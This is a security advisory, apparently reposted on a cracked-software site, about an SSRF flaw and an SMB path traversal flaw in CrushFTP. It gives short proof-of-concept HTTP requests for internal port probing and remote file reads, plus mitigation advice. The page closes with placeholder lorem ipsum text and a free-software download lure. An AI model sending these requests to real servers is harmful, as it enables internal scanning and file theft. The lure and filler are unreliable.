# 🚨 CVE-2025-32102 & CVE-2025-32103: SSRF and Directory Traversal in CrushFTP **Author:** Rafael Pedrero **Published:** April 4, 2025 **Source:** [Full Disclosure Mailing List](https://seclists.org/fulldisclosure/2025/Apr/17) --- ## 📌 Overview Two critical vulnerabilities have been identified in CrushFTP versions 9.x through 11.3.1: - **CVE-2025-32102**: Server-Side Request Forgery (SSRF) - **CVE-2025-32103**: Directory Traversal via SMB UNC paths These flaws allow attackers to perform unauthorized internal network scans and access sensitive files, posing significant security risks. --- ## 🛠️ Vulnerability Details ### CVE-2025-32102: Server-Side Request Forgery (SSRF) **Affected Versions:** CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1 **Description:** The `/WebInterface/function/` endpoint processes `command=telnetSocket` requests with `host` and `port` parameters. Due to inadequate validation, attackers can exploit this to initiate arbitrary connections to internal systems. **Proof of Concept:** ```http POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080 Expected Responses: Open Port (e.g., 8080): <commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)</data></response></commandResult> Closed Port (e.g., 8888): <commandResult><response><error>ERROR:java.net.ConnectException: Connection refused: getsockopt: (/127.0.0.1)</error>Error:java.lang.NullPointerException</response></commandResult> CVE-2025-32103: Directory Traversal via SMB UNC Paths Affected Versions: CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1 Description: The application fails to properly sanitize file path inputs, allowing attackers to traverse directories and access files via SMB UNC paths (e.g., \\server\share ). Proof of Concept: POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded command=readFile&path=\\192.168.1.100\shared\secret.txt This request attempts to read secret.txt from a shared folder on a remote server, bypassing local file access restrictions. 🛡️ Mitigation Recommended Action: Upgrade to the latest version of CrushFTP (11.3.2 or later) where these vulnerabilities have been addressed. Additional Measures: Input Validation: Ensure that all user inputs, especially those related to network addresses and file paths, are properly validated and sanitized. Network Segmentation: Restrict internal network access from the application server to prevent unauthorized connections. Monitoring: Implement logging and monitoring to detect unusual activities, such as unexpected internal network scans or file access attempts. 🔗 References Full Disclosure Advisory CrushFTP Official Website Common Weakness Enumeration: CWE-918 (SSRF) Common Weakness Enumeration: CWE-40 (Directory Traversal) 🧑💻 About the Author Rafael Pedrero is a cybersecurity researcher specializing in web application vulnerabilities. His contributions to the security community include the discovery and responsible disclosure of critical flaws in widely used software applications. Stay informed and ensure your systems are up-to-date to protect against these vulnerabilities.

Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

CrushFTP CVE-2025-32102

NikolasHume

Lorem ipsum dolor sit amet, consectetur adipiscing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.
Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

📱

Download Now—Top Software, No Cost!